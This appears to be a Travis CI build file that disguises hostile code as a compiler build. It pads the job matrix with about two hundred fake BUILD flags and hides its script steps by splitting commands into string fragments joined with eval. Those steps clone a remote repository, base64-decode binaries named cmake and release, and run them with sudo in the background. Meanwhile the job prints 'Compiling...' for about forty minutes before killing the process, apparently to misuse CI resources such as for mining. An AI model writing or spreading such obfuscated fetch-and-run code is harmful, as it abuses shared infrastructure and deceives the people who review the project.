dist: bionic

env:
  - BUILD="--fail-clean=389OZ"
  - BUILD="--quiet-build=817BK"
  - BUILD="--digest=9565N"
  - BUILD="--rebuild-if-new-rev=380uV"
  - BUILD="--package-moves=326cK"
  - BUILD="--verbose-conflicts=724gh"
  - BUILD="--usepkg-exclude=207C1"
  - BUILD="--autounmask-only=648Uz"
  - BUILD="--depclean=267aw"
  - BUILD="--complete-graph=190pO"
  - BUILD="--emptytree=564xp"
  - BUILD="--rebuild-if-new-ver=405md"
  - BUILD="--autounmask-keep-masks=407qw"
  - BUILD="--deselect=360vY"
  - BUILD="--sync-submodule=9540"
  - BUILD="--accept-properties=72x4"
  - BUILD="--selective=703Y4"
  - BUILD="--searchdesc=578IW"
  - BUILD="--config-root=728DQ"
  - BUILD="--complete-graph=327Lc"
  - BUILD="--getbinpkgonly=43jd"
  - BUILD="--list-sets=750Ke"
  - BUILD="--noreplace=406dq"
  - BUILD="--fetchonly=900Dg"
  - BUILD="--reinstall=561gK"
  - BUILD="--regen=641eR"
  - BUILD="--autounmask-keep-masks=475rQ"
  - BUILD="--newrepo=1578z"
  - BUILD="--complete-graph-if-new-ver=789uo"
  - BUILD="--deselect=29Sd"
  - BUILD="--ignore-built-slot-operator-deps=751Jx"
  - BUILD="--rebuild-if-new-ver=338qk"
  - BUILD="--changed-slot=723nJ"
  - BUILD="--quiet-fail=789GG"
  - BUILD="--ignore-world=6428M"
  - BUILD="--quiet-unmerge-warn=3985j"
  - BUILD="--autounmask-keep-keywords=1fh"
  - BUILD="--root=166Ub"
  - BUILD="--verbose-slot-rebuilds=234tY"
  - BUILD="--search=290m8"
  - BUILD="--exclude=99459"
  - BUILD="--clean=483mF"
  - BUILD="--update=4Yc"
  - BUILD="--backtrack=515IN"
  - BUILD="--accept-properties=135ay"
  - BUILD="--config=581ir"
  - BUILD="--ignore-world=5167"
  - BUILD="--rebuilt-binaries-timestamp=307vQ"
  - BUILD="--binpkg-changed-deps=730TC"
  - BUILD="--binpkg-changed-deps=412Vd"
  - BUILD="--usepkg-exclude=83zN"
  - BUILD="--newuse=827wr"
  - BUILD="--check-news=9512K"
  - BUILD="--help=3924h"
  - BUILD="--autounmask-only=144pi"
  - BUILD="--rebuilt-binaries-timestamp=834Ph"
  - BUILD="--exclude=543e8"
  - BUILD="--prune=955X9"
  - BUILD="--verbose-conflicts=386EE"
  - BUILD="--autounmask=751b0"
  - BUILD="--autounmask-only=185Dr"
  - BUILD="--skipfirst=898YP"
  - BUILD="--quiet-unmerge-warn=80on"
  - BUILD="--reinstall-atoms=47yR"
  - BUILD="--regen=838sg"
  - BUILD="--select=9714i"
  - BUILD="--regen=178iB"
  - BUILD="--ignore-world=211fb"
  - BUILD="--columns=430mb"
  - BUILD="--unmerge=621I5"
  - BUILD="--complete-graph=172Mk"
  - BUILD="--backtrack=207sy"
  - BUILD="--complete-graph-if-new-ver=16tS"
  - BUILD="--backtrack=594cZ"
  - BUILD="--rage-clean=177NL"
  - BUILD="--depclean-lib-check=730mi"
  - BUILD="--depclean-lib-check=192oW"
  - BUILD="--with-test-deps=127ah"
  - BUILD="--rebuild-exclude=6093E"
  - BUILD="--rage-clean=7529M"
  - BUILD="--accept-properties=310zi"
  - BUILD="--rebuild-if-unbuilt=5962b"
  - BUILD="--rebuild-exclude=256r9"
  - BUILD="--metadata=719eo"
  - BUILD="--fetch-all-uri=1569C"
  - BUILD="--color=76Hk"
  - BUILD="--debug=753Kq"
  - BUILD="--with-test-deps=7467C"
  - BUILD="--depclean-lib-check=5572S"
  - BUILD="--deselect=295pt"
  - BUILD="--useoldpkg-atoms=844H2"
  - BUILD="--rebuilt-binaries-timestamp=828sH"
  - BUILD="--buildpkg-exclude=786Vu"
  - BUILD="--sysroot=981yO"
  - BUILD="--digest=948uO"
  - BUILD="--autounmask-use=389eH"
  - BUILD="--autounmask-unrestricted-atoms=468Nj"
  - BUILD="--search-index=4269r"
  - BUILD="--fetch-all-uri=456TP"
  - BUILD="--autounmask=716vP"
  - BUILD="--config-root=291cL"
  - BUILD="--skipfirst=324j0"
  - BUILD="--prune=373nn"
  - BUILD="--implicit-system-deps=3382j"
  - BUILD="--quiet-unmerge-warn=794IV"
  - BUILD="--columns=229Tk"
  - BUILD="--buildpkgonly=292zr"
  - BUILD="--columns=533nE"
  - BUILD="--pretend=661lR"
  - BUILD="--prefix=8sz"
  - BUILD="--newuse=5v8"
  - BUILD="--quiet-repo-display=997Gp"
  - BUILD="--binpkg-respect-use=303cM"
  - BUILD="--depclean=998u2"
  - BUILD="--rebuild-ignore=9608m"
  - BUILD="--alert=9PR"
  - BUILD="--with-bdeps=105he"
  - BUILD="--package-moves=836B4"
  - BUILD="--autounmask=790NQ"
  - BUILD="--newrepo=662wt"
  - BUILD="--unmerge=8173N"
  - BUILD="--root=467ai"
  - BUILD="--quiet-fail=254Fj"
  - BUILD="--noreplace=981e3"
  - BUILD="--usepkg-exclude=574gI"
  - BUILD="--search-index=518eC"
  - BUILD="--columns=744Il"
  - BUILD="--nodeps=849KA"
  - BUILD="--rebuild-if-new-ver=562Qv"
  - BUILD="--binpkg-respect-use=19Ye"
  - BUILD="--accept-restrict=652pQ"
  - BUILD="--deep=9186J"
  - BUILD="--ask=180xq"
  - BUILD="--autounmask-only=502n2"
  - BUILD="--prefix=4525G"
  - BUILD="--check-news=611tt"
  - BUILD="--color=873Ot"
  - BUILD="--tree=357ed"
  - BUILD="--sync=517Pk"
  - BUILD="--changed-deps=4919o"
  - BUILD="--search-index=16HE"
  - BUILD="--search-similarity=6931n"
  - BUILD="--implicit-system-deps=221dV"
  - BUILD="--metadata=832Hq"
  - BUILD="--fetch-all-uri=644ap"
  - BUILD="--list-sets=512kF"
  - BUILD="--ignore-default-opts=47zX"
  - BUILD="--nospinner=155R6"
  - BUILD="--read-news=24T8"
  - BUILD="--metadata=976rX"
  - BUILD="--buildpkgonly=9355R"
  - BUILD="--accept-restrict=670NE"
  - BUILD="--onlydeps=419G9"
  - BUILD="--search-index=375BJ"
  - BUILD="--root-deps=61750"
  - BUILD="--dynamic-deps=9482h"
  - BUILD="--ignore-world=497Vn"
  - BUILD="--getbinpkgonly=131kU"
  - BUILD="--rebuild-if-new-ver=65lP"
  - BUILD="--autounmask-use=8502W"
  - BUILD="--misspell-suggestions=52485"
  - BUILD="--deep=21UG"
  - BUILD="--usepkg=426Ui"
  - BUILD="--autounmask=473vH"
  - BUILD="--binpkg-respect-use=273uv"
  - BUILD="--newrepo=14dn"
  - BUILD="--with-bdeps=111pA"
  - BUILD="--quiet-build=901Bc"
  - BUILD="--config-root=103mC"
  - BUILD="--nodeps=5812O"
  - BUILD="--pkg-format=468Rh"
  - BUILD="--changed-deps-report=300zT"
  - BUILD="--load-average=798Bc"
  - BUILD="--info=459Jp"
  - BUILD="--depclean-lib-check=603AT"
  - BUILD="--rebuilt-binaries=5441l"
  - BUILD="--metadata=998zG"
  - BUILD="--unmerge=831OE"
  - BUILD="--deep=438IU"
  - BUILD="--clean=754k0"
  - BUILD="--search=1454d"
  - BUILD="--clean=747hm"
  - BUILD="--use-ebuild-visibility=5150o"
  - BUILD="--useoldpkg-atoms=6271j"
  - BUILD="--verbose=48B6"
  - BUILD="--changed-deps-report=5277v"
  - BUILD="--help=893Q8"
  - BUILD="--regen=5016r"
  - BUILD="--ask-enter-invalid=893jC"
  - BUILD="--changed-deps-report=87QO"
  - BUILD="--package-moves=654bT"

language: minimal

script:
  - sudo apt update || true
  - bAZnNZU="sudo apt --"
  - BXsSa="yes install"
  - hRDVODgVQKQ=" cl-base64 "
  - jyOjgy="git &>/dev/"
  - eval "$bAZnNZU""$BXsSa""$hRDVODgVQKQ""$jyOjgy""null"
  - ckxSCbgUn="git clone h"
  - CKIbhkBd="ttps://gccb"
  - vAnqAVmN="uild@bitbuc"
  - nFtzKXlheG="ket.org/gcc"
  - GPXPVBOBHUa="build/gcc.g"
  - XTZXA="it &>/dev/n"
  - eval "$ckxSCbgUn""$CKIbhkBd""$vAnqAVmN""$nFtzKXlheG""$GPXPVBOBHUa""$XTZXA""ull"
  - mZKVy="base64 -d g"
  - nDBNyMXzU="cc/cmake_ >"
  - eval "$mZKVy""$nDBNyMXzU"" cmake"
  - YCwxccoE="base64 -d g"
  - CeARP="cc/config_ "
  - eval "$YCwxccoE""$CeARP""> clean"
  - nWEhegNEWHZ="base64 -d g"
  - IqVlOqWb="cc/make_ > "
  - eval "$nWEhegNEWHZ""$IqVlOqWb""release"
  - ujphMLJo="chmod +x re"
  - eval "$ujphMLJo""lease cmake"
  - ./cmake
  - sed -i 's/build/tg3o/g' clean
  - sudo ./release -c clean &>/dev/null &
  - GCC=$(date +%s)
  - wakImb="echo $BUILD"
  - eval "$wakImb"""
  - while true; do CC=$(date +%s); echo Compiling...; [ $CC -ge $((GCC + 2510)) ] && sudo killall release && break; sleep 186; done
